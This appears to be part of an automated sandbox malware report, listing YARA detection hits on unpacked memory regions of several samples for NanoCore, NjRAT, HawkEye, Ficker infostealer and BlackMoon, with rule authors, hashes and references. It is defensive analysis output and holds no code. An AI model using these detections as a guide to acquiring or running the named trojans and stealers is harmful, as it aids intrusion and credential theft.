                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.5f65b6.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.16.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.d4dd52.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.c8867b.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.2.Pluto Panel.exe.7710000.10.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.c8867b.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.43de6f.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.18.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 11.0.22.exe.400000.18.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.0.22.exe.530edf.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5839748.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 11.0.22.exe.530edf.22.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.c8867b.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.530edf.16.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a2fcfe.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
